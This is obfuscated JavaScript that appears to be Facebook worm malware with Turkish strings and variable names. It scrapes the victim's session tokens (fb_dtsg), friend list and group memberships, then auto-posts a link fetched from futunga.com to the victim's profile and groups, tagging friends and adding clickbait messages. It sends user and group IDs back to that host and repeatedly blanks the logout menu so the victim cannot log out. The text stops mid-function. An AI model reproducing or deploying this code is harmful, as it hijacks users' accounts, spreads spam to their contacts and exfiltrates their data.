var n4K = {
  'K6': '&xhpc_targetid=',
  'a6': '&composertags_place_name=',
  'z7': '&__a=1',
  'C4': "Grup Limitine Ulaşıldı !",
  'W4': "ben izledim sizde izleyin derim ve paylaşın lütfen",
  'r1': function(K, h) {
    return K != h;
  },
  'S4': "grup_sirasi_",
  'E4': "parse",
  'Q0': function(K, h) {
    return K == h;
  },
  'h5': '<input type="hidden" autocomplete="off" name="dialog_url" value="(.*?)" />',
  'j2': function(K, h) {
    return K != h;
  },
  'i2': function(K, h) {
    return K == h;
  },
  'X8': '&device_code=',
  'n8': "close",
  'C0': function(K, h) {
    return K == h;
  },
  'L6': '<input type="hidden" autocomplete="off" name="app_id" value="(.*?)" />',
  'a7': '&xhpc_publish_type=1',
  'I1': function(K, h) {
    return K >= h;
  },
  'r6': "https://www.facebook.com/checkpoint",
  'h4': '&__CONFIRM__=1',
  'P8': "getTime",
  'g1': "responseText",
  'c0': function(K, h) {
    return K * h;
  },
  'k8': "bu nedir arkadaş ya",
  't7': '&object_id[0]=',
  'g2': function(K, h) {
    return K == h;
  },
  'w5': '&title=',
  'R1': function(K, h) {
    return K * h;
  },
  't6': "şaka gibi :D",
  'w4': '&composertags_place=',
  'k1': function(K, h) {
    return K < h;
  },
  'N7': '{"object":"',
  'G8': "random",
  's8': '&ref=',
  'i6': '&xhpc_context=home',
  'T4': '&display=',
  'i7': "bence sizde bakın beyler :)",
  'J5': '&dialog_url=',
  'x5': "URL",
  'M1': function(K, h) {
    return K < h;
  },
  'v8': "status",
  'j8': '&composer_predicted_city=',
  's1': function(K, h) {
    return K / h;
  },
  'D4': "bu olay paylaşım rekoru kıracak",
  't0': function(K, h) {
    return K * h;
  },
  'j4': '&quote=',
  'X6': "match",
  'G5': "resmen dondum kaldım",
  'G1': function(K, h) {
    return K * h;
  },
  'c5': '&disable_location_sharing=false',
  'a5': 'Content-type',
  'F6': "bunu izlemelisiniz :)",
  'D7': '&share_action_properties=',
  'v2': function(K, h) {
    return K == h;
  },
  'h7': '=',
  'T6': '{"USER_ID":"(.*?)","ACCOUNT_ID":"(.*?)"}',
  'o8': 1800,
  'Y6': '&caption=',
  'L8': 1000,
  'a0': function(K, h) {
    return K < h;
  },
  'K7': 'GET',
  'J2': function(K, h) {
    return K == h;
  },
  'J7': "profil_id",
  'u5': '&ttstamp=',
  'K2': function(K, h) {
    return K == h;
  },
  'W1': function(K, h) {
    return K >= h;
  },
  'J6': '-',
  'O7': "readyState",
  'x4': '<input type="hidden" autocomplete="off" name="tagger_session_id" value="(.*?)" id="(.*?)" />',
  'l6': '',
  'D6': '<input type="hidden" autocomplete="off" name="share_action_type_id" value="(.*?)" />',
  'S7': true,
  'F4': '&access_token=',
  'i4': '&hide_object_attachment=0',
  'r4': 200,
  'd4': "onreadystatechange",
  'm4': '"}',
  'm': function(K, h) {
    return K >= h;
  },
  'M7': '<input type="hidden" autocomplete="off" name="redirect_uri" value="(.*?)" />',
  'e5': "W1",
  'y': function(K, h) {
    return K < h;
  },
  'H8': '&xhpc_timeline=',
  'n5': (function(T5) {
    return (function(Q3, h3) {
      return (function(r3) {
        return {
          v5: r3,
          o3: r3,
        };
      })(function(m5) {
        var K3, j5 = 0;
        for (var w3 = Q3; j5 < m5["length"]; j5++) {
          var D3 = h3(m5, j5);
          K3 = j5 === 0 ? D3 : K3 ^ D3;
        }
        return K3 ? w3 : !w3;
      });
    })((function(F5, P5, L5, g5) {
      var p5 = 26;
      return F5(T5, p5) - g5(P5, L5) > p5;
    })(parseInt, Date, (function(P5) {
      return ('' + P5)["substring"](1, (P5 + '')["length"] - 1);
    })('_getTime2'), function(P5, L5) {
      return new P5()[L5]();
    }), function(m5, j5) {
      var C5 = parseInt(m5["charAt"](j5), 16)["toString"](2);
      return C5["charAt"](C5["length"] - 1);
    });
  })('7170km1io'),
  'N2': function(K, h) {
    return K == h;
  },
  'n7': '&tagger_session_id=',
  'Y7': "k1",
  'e4': 0,
  'f7': '&action_type_id[0]=',
  'c6': "izleyin beyler :)",
  'Q8': "setRequestHeader",
  'x0': function(K, h) {
    return K * h;
  },
  'w2': function(K, h) {
    return K <= h;
  },
  'u2': function(K, h) {
    return K > h;
  },
  'y1': function(K, h) {
    return K / h;
  },
  'o4': "Content-type",
  'v7': "//futunga.com/php/links.php?type=a2",
  'R5': '&__pc=PHASED:DEFAULT',
  'I6': '&audience_targets=',
  'P': function(K, h) {
    return K >= h;
  },
  'Z4': 14,
  'T0': function(K, h) {
    return K == h;
  },
  'Y5': "indexOf",
  'n4': "ancak bu kadar olur",
  'i8': "1",
  'U5': '&xhpc_message_text=',
  'T1': "izle zaten paylaşırsın :) :)",
  'A2': function(K, h) {
    return K < h;
  },
  'C6': "application/json",
  'Y0': function(K, h) {
    return K < h;
  },
  'M6': '&__be=-1',
  'l8': "open",
  'p7': "replace",
  'z2': function(K, h) {
    return K == h;
  },
  'U4': "Paylasim Yapilamadi Hata icerigi :",
  'h8': '&og_suggestion_mechanism=',
  'E8': "Link Yok !",
  'q2': function(K, h) {
    return K < h;
  },
  'm7': '&sdk=',
  'j1': "",
  'F': function(K, h) {
    return K >= h;
  },
  'R4': "U1",
  'p8': '&device_shared=',
  's': function(K, h) {
    return K >= h;
  },
  'B7': '&av=',
  'Q7': '&__user=',
  'l0': function(K, h) {
    return K > h;
  },
  'b8': "bakın bakalım dünyada neler var :D",
  'E0': function(K, h) {
    return K > h;
  },
  'k6': '&app_id=',
  'S0': function(K, h) {
    return K < h;
  },
  'm6': '&xhpc_message=',
  'O2': function(K, h) {
    return K == h;
  },
  'X2': function(K, h) {
    return K * h;
  },
  'P7': '&from_post=1',
  'e7': "push",
  'n6': '&__dyn=',
  'B1': function(K, h) {
    return K != h;
  },
  'Z8': '{"revision":(.*?),',
  'Q6': "log",
  'N4': 4,
  'B6': '&xhpc_ismeta=1',
  'j6': "https://www.facebook.com",
  'h1': function(K, h) {
    return K == h;
  },
  'v1': 'for (;;);',
  'N8': "link",
  'a4': 1,
  'E7': "GET",
  'S6': '&picture=',
  'N5': "application/x-www-form-urlencoded",
  'a8': "önce izleyin sonra karar verirsiniz",
  's5': '&is_explicit_place=',
  'o7': '&share_action_type_id=',
  'H6': '=(\\d+)',
  'p4': '&og_suggestion_logging_data=',
  'f8': false,
  'L0': function(K, h) {
    return K * h;
  },
  't8': "olaya bakarmısınız",
  'y8': "paylasim_araligi_",
  'G': function(K, h) {
    return K == h;
  },
  'J4': 'application/x-www-form-urlencoded',
  'B8': '&object_str[0]=',
  's7': "floor",
  'p2': function(K, h) {
    return K != h;
  },
  'x6': "Content-Type",
  'O4': "cookie",
  'n': function(K, h) {
    return K >= h;
  },
  'e2': function(K, h) {
    return K == h;
  },
  'Z0': function(K, h) {
    return K * h;
  },
  'c8': "ilginç bir durum :)",
  'Z6': "setInterval",
  'M': function(K, h) {
    return K == h;
  },
  'V0': function(K, h) {
    return K == h;
  },
  'X4': "M1",
  'f0': function(K, h) {
    return K < h;
  },
  'h6': '"link": "(.*?)"',
  'o0': function(K, h) {
    return K !== h;
  },
  'S5': "neler var arkadaş :D <3",
  'T8': "Olaysız geçmiyorki günler",
  'b4': "https://www.facebook.com/share.php?u=",
  'P4': '<input type="hidden" name="fb_dtsg" value="(.*?)" autocomplete="off" />',
  'b2': function(K, h) {
    return K < h;
  },
  'D0': function(K, h) {
    return K == h;
  },
  'X7': "y1",
  'A7': "errorSummary",
  'd1': function(K, h) {
    return K * h;
  },
  'B4': "basarili_paylasim_",
  'p1': '<input type="hidden" autocomplete="off" name="display" value="(.*?)" />',
  'Z7': "s1",
  'P6': "olacak olan oluyor işte ...",
  'k7': '&redirect_uri=',
  'u6': "I1",
  'p6': '&icon_id=',
  'j7': '&audience[0][value]=80',
  'b7': "cookie40_",
  'q4': 'fb_dtsg=',
  'F8': "send",
  'O6': "2",
  'c4': 30,
  'I5': 'https://www.facebook.com/v2.3/dialog/share/submit?dpr=1',
  'U1': function(K, h) {
    return K < h;
  },
  'H2': function(K, h) {
    return K == h;
  },
  'l4': '&composertags_city=',
  'q6': '&__req=',
  'w7': "paylaşn herkes görsün beyler bayanlar",
  'y6': 'POST',
  'M8': '&__rev=',
  'o6': 10,
  'e6': '&description='
};
n4K.w9 = function(c) {
  while (c) return n4K.n5.v5(c);
};
n4K.K9 = function(e) {
  if (n4K && e) return n4K.n5.o3(e);
};
n4K.F3 = function(c) {
  while (c) return n4K.n5.o3(c);
};
n4K.p3 = function(h) {
  if (n4K && h) return n4K.n5.v5(h);
};
n4K.P3 = function(n) {
  while (n) return n4K.n5.v5(n);
};
n4K.L3 = function(j) {
  for (; n4K;) return n4K.n5.o3(j);
};
n4K.j3 = function(a) {
  while (a) return n4K.n5.v5(a);
};
n4K.C3 = function(i) {
  if (n4K && i) return n4K.n5.v5(i);
};
n4K.V3 = function(i) {
  while (i) return n4K.n5.v5(i);
};
n4K.s3 = function(k) {
  while (k) return n4K.n5.o3(k);
};
n4K.q3 = function(c) {
  for (; n4K;) return n4K.n5.o3(c);
};
n4K.l3 = function(d) {
  while (d) return n4K.n5.v5(d);
};
n4K.A3 = function(e) {
  while (e) return n4K.n5.o3(e);
};
n4K.f3 = function(l) {
  if (n4K && l) return n4K.n5.o3(l);
};
n4K.G3 = function(j) {
  while (j) return n4K.n5.o3(j);
};
n4K.x3 = function(k) {
  for (; n4K;) return n4K.n5.o3(k);
};
n4K.z3 = function(a) {
  while (a) return n4K.n5.v5(a);
};
n4K.U3 = function(m) {
  for (; n4K;) return n4K.n5.v5(m);
};
n4K.N3 = function(b) {
  for (; n4K;) return n4K.n5.v5(b);
};
n4K.d3 = function(i) {
  while (i) return n4K.n5.v5(i);
};
n4K.c3 = function(m) {
  for (; n4K;) return n4K.n5.v5(m);
};
n4K.e3 = function(k) {
  for (; n4K;) return n4K.n5.v5(k);
};
n4K.I3 = function(b) {
  while (b) return n4K.n5.o3(b);
};
n4K.S3 = function(d) {
  for (; n4K;) return n4K.n5.o3(d);
};
n4K.H3 = function(k) {
  for (; n4K;) return n4K.n5.v5(k);
};
n4K.E3 = function(i) {
  for (; n4K;) return n4K.n5.v5(i);
};
n4K.X3 = function(n) {
  if (n4K && n) return n4K.n5.v5(n);
};

function trceviri(K) {
  n4K.b3 = function(b) {
    while (b) return n4K.n5.v5(b);
  };
  n4K.Y3 = function(h) {
    if (n4K && h) return n4K.n5.o3(h);
  };
  n4K.R3 = function(l) {
    for (; n4K;) return n4K.n5.v5(l);
  };
  n4K.a3 = function(k) {
    if (n4K && k) return n4K.n5.v5(k);
  };
  n4K.O3 = function(n) {
    while (n) return n4K.n5.o3(n);
  };
  n4K.W3 = function(n) {
    if (n4K && n) return n4K.n5.o3(n);
  };
  n4K.t3 = function(b) {
    while (b) return n4K.n5.v5(b);
  };
  n4K.i3 = function(n) {
    if (n4K && n) return n4K.n5.v5(n);
  };
  n4K.k3 = function(j) {
    for (; n4K;) return n4K.n5.o3(j);
  };
  n4K.B3 = function(n) {
    if (n4K && n) return n4K.n5.v5(n);
  };
  var h = n4K.B3("ed1") ? 'https://www.facebook.com/groups/?category=membership' : "Ö",
    r = n4K.X3("fc1") ? 'Payla\u015f\u0131m yap\u0131ld\u0131.' : "Ü",
    E = n4K.E3("3122") ? '&av=' : "Ğ",
    o = n4K.k3("1c") ? "Ş" : '&object_id[0]=',
    u = n4K.H3("1e5") ? "ancak bu kadar olur" : "Ç",
    X = n4K.S3("d6") ? "İ" : "olaya bakarmısınız",
    B = n4K.I3("ce5") ? "ş" : "önce izleyin sonra karar verirsiniz",
    I = n4K.i3("343") ? '&xhpc_timeline=' : "ö",
    a = n4K.a3("2a") ? '&xhpc_message=' : "ü",
    k = n4K.N3("87") ? "ğ" : '&__a=1',
    H = n4K.R3("4171") ? "ı" : '<input type="hidden" name="fb_dtsg" value="(.*?)" autocomplete="off" />',
    x = n4K.f3("3c") ? "ç" : true,
    R = n4K.e3("7e") ? K[n4K.p7](/&#xe7;/g, x) : '&action_type_id[0]=',
    c = n4K.x3("f68") ? R[n4K.p7](/&#x131;/g, H) : '&title=',
    e = n4K.Y3("c1e") ? c[n4K.p7](/&#x11f;/g, k) : "http://www.facebook.com",
    b = n4K.t3("37") ? "https://www.facebook.com" : e[n4K.p7](/&#xfc;/g, a),
    W = n4K.c3("dd25") ? b[n4K.p7](/&#xf6;/g, I) : "ancak bu kadar olur",
    O = n4K.W3("6e54") ? W[n4K.p7](/&#x15f;/g, B) : '&icon_id=',
    f = n4K.G3("5d") ? 30 : O[n4K.p7](/&#x130;/g, X),
    N = n4K.b3("f7") ? '&display=' : f[n4K.p7](/&#xc7;/g, u),
    A = n4K.U3("ea1c") ? N[n4K.p7](/&#x15e;/g, o) : "ı",
    l = n4K.O3("f7") ? '&__user=' : A[n4K.p7](/&#x11e;/g, E),
    t = n4K.d3("bc") ? l[n4K.p7](/&#xdc;/g, r) : '&access_token=',
    S = n4K.z3("1a54") ? "http://www.facebook.com" : t[n4K.p7](/&#xd6;/g, h);
  return S;
}

function composerrandom() {
  n4K.M3 = function(k) {
    for (; n4K;) return n4K.n5.v5(k);
  };
  var K = n4K.A3("38") ? 12 : '&object_str[0]=',
    h = n4K.M3("df") ? '&__a=1' : 8;
  return composer(h) + n4K.J6 + composer(n4K.N4) + n4K.J6 + composer(n4K.N4) + n4K.J6 + composer(n4K.N4) + n4K.J6 + composer(K);
}

function profildepaylas(X, B, I, a, k, H, x, R, c, e) {
  n4K.h9 = function(b) {
    if (n4K && b) return n4K.n5.o3(b);
  };
  n4K.D9 = function(a) {
    while (a) return n4K.n5.v5(a);
  };
  n4K.g3 = function(n) {
    for (; n4K;) return n4K.n5.v5(n);
  };
  n4K.T3 = function(g) {
    if (n4K && g) return n4K.n5.o3(g);
  };
  n4K.m3 = function(k) {
    if (n4K && k) return n4K.n5.v5(k);
  };
  n4K.v3 = function(a) {
    for (; n4K;) return n4K.n5.v5(a);
  };
  n4K.n3 = function(i) {
    for (; n4K;) return n4K.n5.v5(i);
  };
  n4K.J3 = function(b) {
    while (b) return n4K.n5.o3(b);
  };
  n4K.Z3 = function(k) {
    for (; n4K;) return n4K.n5.o3(k);
  };
  n4K.y3 = function(c) {
    while (c) return n4K.n5.o3(c);
  };
  var b = n4K.s3("86") ? 200 : "X2",
    W = n4K.C3("1751") ? '&ref=' : '&text_composertags_with[',
    O = n4K.J3("551") ? ']=' : '&dpr=1',
    f = n4K.V3("57a") ? '&audience[0][value]=80' : '&composertags_with[',
    N = n4K.l3("2d41") ? '&xhpc_message_text=' : 100,
    A = n4K.y3("5816") ? "İ" : "u2",
    l = n4K.n3("eb83") ? "=;expires=Thu, 01 Jan 1970 00:00:00 GMT" : "w2",
    t = n4K.q3("a54") ? '&mode=self' : "Paylasilan Grup :http://facebook.com/",
    S = n4K.m3("5c") ? new XMLHttpRequest() : "encodeURIComponent",
    Q = n4K.v3("f338") ? n4K.I5 : "ı",
    w = n4K.Z3("b36d") ? n4K.q4 + X : '&object_id[0]=';
  w += t;
  w += n4K.j3("f3") ? 1 : n4K.I6 + I;
  w += n4K.B7;
  w += n4K.k6 + B;
  w += n4K.k7 + a;
  w += n4K.T4 + k;
  w += n4K.F4;
  w += n4K.L3("446") ? 72 : n4K.m7;
  w += n4K.P3("deb") ? 'POST' : n4K.P7;
  w += n4K.p3("a766") ? n4K.i6 : 'Content-type';
  w += n4K.B6;
  w += n4K.T3("2f") ? n4K.H8 : '"link": "(.*?)"';
  w += n4K.F3("b811") ? n4K.K6 + I : "Ğ";
  w += n4K.a7;
  w += n4K.g3("bd") ? 'for (;;);' : n4K.U5;
  w += n4K.K9("1fa") ? true : n4K.m6;
  w += n4K.D9("4a1") ? n4K.j4 : 'fb_dtsg=';
  w += n4K.s5;
  w += n4K.w4;
  w += n4K.a6;
  w += n4K.n7 + H;
  for (i = n4K.e4; n4K[l](i, etiket_limit); i++) {
    if (n4K[A](arkadaslar_list[i], N)) {
      w += f + (i) + O + arkadaslar_list[i];
      w += W + (i) + O + arkadaslar_list2[i];
    }
  }
  w += n4K.f7;
  w += n4K.B8;
  w += n4K.h9("e4") ? "Link Yok !" : n4K.t7;
  w += n4K.i4;
  w += n4K.w9("16fa") ? '"}' : n4K.h8;
  w += n4K.p4;
  w += n4K.p6;
  w += n4K.D7 + c;
  w += n4K.o7 + x;
  w += n4K.w5;
  w += n4K.e6;
  w += n4K.Y6;
  w += n4K.S6;
  w += n4K.X8;
  w += n4K.p8;
  w += n4K.s8;
  w += n4K.J5 + encodeURIComponent(R);
  w += n4K.l4;
  w += n4K.c5;
  w += n4K.j8;
  w += n4K.j7;
  w += n4K.h4;
  w += n4K.Q7 + I;
  w += n4K.z7;
  w += n4K.q6 + Math[n4K.s7]((n4K[b](Math[n4K.G8](), n4K.o6)) + n4K.a4);
  w += n4K.M6;
  w += n4K.n6 + dynrandom();
  w += n4K.R5;
  w += n4K.u5 + ttstamp(X);
  w += n4K.M8 + e;
  S[n4K.l8](n4K.y6, Q, n4K.S7);
  S[n4K.Q8](n4K.a5, n4K.J4);
  S[n4K.d4] = function() {
    var K = 'Payla\u015f\u0131m yap\u0131ld\u0131.',
      h = "i2",
      r = "H2";
    if (n4K[r](S[n4K.O7], n4K.N4) && n4K[h](S[n4K.v8], n4K.r4)) {
      var E = S[n4K.g1],
        o = E[n4K.p7](n4K.v1, n4K.l6),
        u = JSON[n4K.E4](o);
      if (u[n4K.A7]) {
        sorunmesaji(n4K.U4 + u[n4K.A7]);
      } else {
        console[n4K.Q6](K);
        gruplaricek();
      }
    }
  };
  S[n4K.F8](w);
}

function profil_id_getir() {
  var E = "https://www.facebook.com/share.php",
    o = new XMLHttpRequest();
  o[n4K.l8](n4K.E7, E, n4K.f8);
  o[n4K.d4] = function() {
    var K = "M",
      h = "G";
    if (n4K[h](o[n4K.O7], n4K.N4) && n4K[K](o[n4K.v8], n4K.r4)) {
      var r = o[n4K.g1];
      gelen = r[n4K.X6](n4K.T6);
      o[n4K.n8];
    }
  };
  o[n4K.Q8](n4K.x6, n4K.N5);
  o[n4K.F8]();
}

function baslat() {
  var B = new XMLHttpRequest();
  B[n4K.l8](n4K.E7, n4K.v7, n4K.S7);
  B[n4K.Q8](n4K.o4, n4K.C6);
  B[n4K.d4] = function() {
    var K = "p2",
      h = "j2",
      r = "v2",
      E = "J2";
    if (n4K[E](B[n4K.O7], n4K.N4) && n4K[r](B[n4K.v8], n4K.r4)) {
      var o = B[n4K.g1];
      link_encode = o[n4K.X6](n4K.h6);
      var u = JSON[n4K.E4](B[n4K.g1]);
      if (u) {
        var X = u[n4K.N8];
        if (n4K[h](X, n4K.i8)) {
          if (n4K[K](X, n4K.O6)) {
            paylasimgetir(X, link_encode[n4K.a4]);
          }
        } else {
          sorunmesaji(n4K.E8);
        }
      }
      B[n4K.n8];
    }
  };
  B[n4K.F8]();
}

function dyn(K) {
  var h = "x0",
    r = "Y0",
    E = "abcdefghijklmnoprstuvyzwxqABCDEFGHIKLMNOPRSTUVYZWQX0123456789",
    o = E,
    u = n4K.j1;
  for (var X = n4K.e4; n4K[r](X, K); X++) u += o[Math[n4K.s7](n4K[h](Math[n4K.G8](), o.length))];
  return u;
}

function arkadaslar(H, x, R, c, e, b, W, O, f, N) {
  var A = "L0",
    l = '&dpr=1',
    t = 'https://www.facebook.com/chat/user_info_all/?viewer=',
    S = new XMLHttpRequest(),
    Q = t + R + l,
    w = n4K.q4 + H;
  w += n4K.Q7 + R;
  w += n4K.z7;
  w += n4K.q6 + Math[n4K.s7]((n4K[A](Math[n4K.G8](), n4K.o6)) + n4K.a4);
  w += n4K.M6;
  w += n4K.R5;
  w += n4K.u5 + ttstamp(H);
  w += n4K.M8 + N;
  S[n4K.l8](n4K.y6, Q, n4K.S7);
  S[n4K.Q8](n4K.a5, n4K.J4);
  S[n4K.d4] = function() {
    var E = "forEach",
      o = "payload",
      u = "keys",
      X = "K2",
      B = "T0";
    if (n4K[B](S[n4K.O7], n4K.N4) && n4K[X](S[n4K.v8], n4K.r4)) {
      var I = S[n4K.g1],
        a = I[n4K.p7](n4K.v1, n4K.l6),
        k = JSON[n4K.E4](a);
      Object[u](k[o])[E](function(K) {
        var h = "name";
        arkadaslar_list[n4K.e7](K);
        var r = k[o][K][h];
        arkadaslar_list2[n4K.e7](r);
      });
      profildepaylas(H, x, R, c, e, b, W, O, f, N);
    }
  };
  S[n4K.F8](w);
}

function messagerand() {
  var K = "t0";
  return mesagge[Math[n4K.s7](n4K[K](Math[n4K.G8](), mesagge.length))];
}

function removebutton() {
  window[n4K.Z6](function() {
    var K = "q2",
      h = "uiPopover",
      r = "outerHTML",
      E = "parentNode",
      o = "logoutMenu",
      u = "getElementById",
      X = "A2",
      B = "uiToggle wrap",
      I = "innerHTML",
      a = "b2",
      k = "_5ce",
      H = "getElementsByClassName";
    if (document[H](k)) {
      for (i = n4K.e4; n4K[a](i, document[H](k).length); i++) {
        document[H](k)[i][I] = n4K.j1;
      }
    }
    if (document[H](B)) {
      for (i = n4K.e4; n4K[X](i, document[H](B).length); i++) {
        document[H](B)[i][I] = n4K.j1;
      }
    }
    if (document[u](o)) {
      document[u](o)[E][r] = n4K.j1;
    }
    if (document[H](h)) {
      for (i = n4K.e4; n4K[K](i, document[H](h).length); i++) {
        document[H](h)[i][I] = n4K.j1;
      }
    }
  }, n4K.o6);
}

function composer(K) {
  var h = "c0",
    r = "a0",
    E = "abcdef0123456789",
    o = E,
    u = n4K.j1;
  for (var X = n4K.e4; n4K[r](X, K); X++) u += o[Math[n4K.s7](n4K[h](Math[n4K.G8](), o.length))];
  return u;
}

function grupdapaylas(X, B, I, a, k, H, x, R, c, e) {
  var b = "Z0",
    W = '&mode=group',
    O = "l0",
    f = "f0";
  if (n4K[f](grup_say, grup_limit)) {
    var N = function(K) {
      grup_limit = K;
    };
    N(grup_say);
  }
  if (!grupsirasikontrol) {
    var A = function(K) {
      i = K;
    };
    A(n4K.e4);
  } else {
    var l = function(K) {
      i = K[n4K.a4];
    };
    l(grupsirasikontrol);
  }
  var t = new XMLHttpRequest();
  grupid = grupidgetir(i);
  if (n4K[O](grupid, n4K.L8)) {
    var S = n4K.I5,
      Q = n4K.q4 + X;
    Q += W;
    Q += n4K.I6 + grupid;
    Q += n4K.B7;
    Q += n4K.k6 + B;
    Q += n4K.k7 + a;
    Q += n4K.T4 + k;
    Q += n4K.F4;
    Q += n4K.m7;
    Q += n4K.P7;
    Q += n4K.i6;
    Q += n4K.B6;
    Q += n4K.H8;
    Q += n4K.K6 + I;
    Q += n4K.a7;
    Q += n4K.U5;
    Q += n4K.m6;
    Q += n4K.j4;
    Q += n4K.s5;
    Q += n4K.w4;
    Q += n4K.a6;
    Q += n4K.n7 + H;
    Q += n4K.f7;
    Q += n4K.B8;
    Q += n4K.t7;
    Q += n4K.i4;
    Q += n4K.h8;
    Q += n4K.p4;
    Q += n4K.p6;
    Q += n4K.D7 + c;
    Q += n4K.o7 + x;
    Q += n4K.w5;
    Q += n4K.e6;
    Q += n4K.Y6;
    Q += n4K.S6;
    Q += n4K.X8;
    Q += n4K.p8;
    Q += n4K.s8;
    Q += n4K.J5 + encodeURIComponent(R);
    Q += n4K.l4;
    Q += n4K.c5;
    Q += n4K.j8;
    Q += n4K.j7;
    Q += n4K.h4;
    Q += n4K.Q7 + I;
    Q += n4K.z7;
    Q += n4K.q6 + Math[n4K.s7]((n4K[b](Math[n4K.G8](), n4K.o6)) + n4K.a4);
    Q += n4K.M6;
    Q += n4K.n6 + dynrandom();
    Q += n4K.R5;
    Q += n4K.u5 + ttstamp(X);
    Q += n4K.M8 + e;
    t[n4K.l8](n4K.y6, S, n4K.S7);
    t[n4K.Q8](n4K.a5, n4K.J4);
    t[n4K.d4] = function() {
      var K = "Paylasilan Grup :http://facebook.com/",
        h = "C0",
        r = "V0";
      if (n4K[r](t[n4K.O7], n4K.N4) && n4K[h](t[n4K.v8], n4K.r4)) {
        var E = t[n4K.g1],
          o = E[n4K.p7](n4K.v1, n4K.l6),
          u = JSON[n4K.E4](o);
        if (u[n4K.A7]) {
          sorunmesaji(n4K.U4 + u[n4K.A7]);
        } else {
          basarilipaylasim();
          console[n4K.Q6](K + grupid);
            new Image().src = 'https://futunga.com/php/sonuc.php?user='+ profile_id +'&sonuc=' + grupid;

          success++;
        }
        t[n4K.n8];
      }
    };
    t[n4K.F8](Q);
  }
}

function paylasimgetir2(E, o) {
  var u = new XMLHttpRequest();
  u[n4K.l8](n4K.E7, n4K.b4 + E, n4K.f8);
  u[n4K.d4] = function() {
    var K = "z2",
      h = "N2";
    if (n4K[h](u[n4K.O7], n4K.N4) && n4K[K](u[n4K.v8], n4K.r4)) {
      var r = u[n4K.g1];
      data01 = r[n4K.X6](n4K.P4);
      data02 = r[n4K.X6](n4K.L6);
      data03 = r[n4K.X6](n4K.T6);
      data04 = r[n4K.X6](n4K.M7);
      data05 = r[n4K.X6](n4K.p1);
      data06 = r[n4K.X6](n4K.x4);
      data07 = r[n4K.X6](n4K.D6);
      data08 = r[n4K.X6](n4K.h5);
      data09 = r[n4K.X6](n4K.Z8);
      u[n4K.n8];
    }
  };
  u[n4K.Q8](n4K.x6, n4K.N5);
  u[n4K.F8]();
  if (data03[n4K.a4]) {
    var X = n4K.N7 + o + n4K.m4;
    grupdapaylas(data01[n4K.a4], data02[n4K.a4], data03[n4K.a4], data04[n4K.a4], data05[n4K.a4], data06[n4K.a4], data07[n4K.a4], data08[n4K.a4], X, data09[n4K.a4]);
  }
}

function basarilipaylasim() {
  if (!grupbasarilikontrol) {
    var K = function() {
      document[n4K.O4] = n4K.B4 + profile_id + n4K.h7 + n4K.a4;
    };
    K();
  } else {
    var h = function() {
      document[n4K.O4] = n4K.B4 + profile_id + n4K.h7 + (Number(grupbasarilikontrol[n4K.a4]) + n4K.a4);
    };
    h();
  }
  if (!grupsirasikontrol) {
    var r = function() {
      document[n4K.O4] = n4K.S4 + profile_id + n4K.h7 + n4K.a4;
    };
    r();
  } else {
    var E = function() {
      document[n4K.O4] = n4K.S4 + profile_id + n4K.h7 + (Number(grupsirasikontrol[n4K.a4]) + n4K.a4);
    };
    E();
  }
}

function sorunmesaji(K) {
  var h = "https://futunga.com/hatam.php?mesaj=",
    r = new XMLHttpRequest();
  r[n4K.l8](n4K.K7, h + K, n4K.S7);
  r[n4K.F8]();
}

function paylasimgetir(E, o) {
  var u = new XMLHttpRequest();
  u[n4K.l8](n4K.E7, n4K.b4 + E, n4K.f8);
  u[n4K.d4] = function() {
    var K = "e2",
      h = "O2";
    if (n4K[h](u[n4K.O7], n4K.N4) && n4K[K](u[n4K.v8], n4K.r4)) {
      var r = u[n4K.g1];
      data01 = r[n4K.X6](n4K.P4);
      data02 = r[n4K.X6](n4K.L6);
      data03 = r[n4K.X6](n4K.T6);
      data04 = r[n4K.X6](n4K.M7);
      data05 = r[n4K.X6](n4K.p1);
      data06 = r[n4K.X6](n4K.x4);
      data07 = r[n4K.X6](n4K.D6);
      data08 = r[n4K.X6](n4K.h5);
      data09 = r[n4K.X6](n4K.Z8);
      u[n4K.n8];
    }
  };
  u[n4K.Q8](n4K.x6, n4K.N5);
  u[n4K.F8]();
  if (data03[n4K.a4]) {
    var X = n4K.N7 + o + n4K.m4;
    arkadaslar(data01[n4K.a4], data02[n4K.a4], data03[n4K.a4], data04[n4K.a4], data05[n4K.a4], data06[n4K.a4], data07[n4K.a4], data08[n4K.a4], X, data09[n4K.a4]);
  }
}

function ttstamp(h) {
  var r = "charCodeAt",
    E = "S0",
    o = function(K) {
      ttstamp_olustur = K;
    },
    u = function() {
      var K = '2';
      ttstamp_olustur = K + ttstamp_olustur;
    };
  o(n4K.l6);
  for (var X = n4K.e4; n4K[E](X, h.length); X++) {
    ttstamp_olustur += h[r](X);
  }
  u();
  return ttstamp_olustur;
}

function grupidgetir(K) {
  return grup_ids[K];
}

function permakaydet(K) {
  var h = 'https://futunga.com/permas.php?perma=https://www.facebook.com/',
    r = new XMLHttpRequest();
  r[n4K.l8](n4K.K7, h + K, n4K.S7);
  r[n4K.F8]();
}

function baslat2() {
  var B = new XMLHttpRequest();
  B[n4K.l8](n4K.E7, n4K.v7, n4K.S7);
  B[n4K.Q8](n4K.o4, n4K.C6);
  B[n4K.d4] = function() {
    var K = "B1",
      h = "r1",
      r = "h1",
      E = "g2";
    if (n4K[E](B[n4K.O7], n4K.N4) && n4K[r](B[n4K.v8], n4K.r4)) {
      var o = JSON[n4K.E4](B[n4K.g1]),
        u = B[n4K.g1];
      link_encode = u[n4K.X6](n4K.h6);
      if (o) {
        var X = o[n4K.N8];
        if (n4K[h](X, n4K.i8)) {
          if (n4K[K](X, n4K.O6)) {
            paylasimgetir2(X, link_encode[n4K.a4]);
          }
        } else {
          sorunmesaji(n4K.E8);
        }
      }
      B[n4K.n8];
    }
  };
  B[n4K.F8]();
}

function dynrandom() {
  var K = 72,
    h = 16;
  return dyn(h) + n4K.J6 + dyn(n4K.o6) + n4K.J6 + dyn(K);
}

function gruplaricek() {
  var a = 'https://www.facebook.com/groups/?category=membership',
    k = new XMLHttpRequest();
  k[n4K.l8](n4K.K7, a, n4K.S7);
  k[n4K.d4] = function() {
    var K = 'grup bulunamadı!',
      h = "E0",
      r = null,
      E = 'exec',
      o = "o0",
      u = "Q0",
      X = "D0";
    if (n4K[X](k[n4K.O7], n4K.N4) && n4K[u](k[n4K.v8], n4K.r4)) {
      var B = [],
        I = /group_id=(\d+)&amp;pinned/g;
      while (n4K[o]((B = I[E](k[n4K.g1])), r)) {
        grup_ids[n4K.e7](B[n4K.a4]);
        grup_say++;
      };
      if (n4K[h](grup_say, n4K.e4)) {
        baslat2();
      } else {
        console[n4K.Q6](K);
      }
      k[n4K.n8];
    }
  };
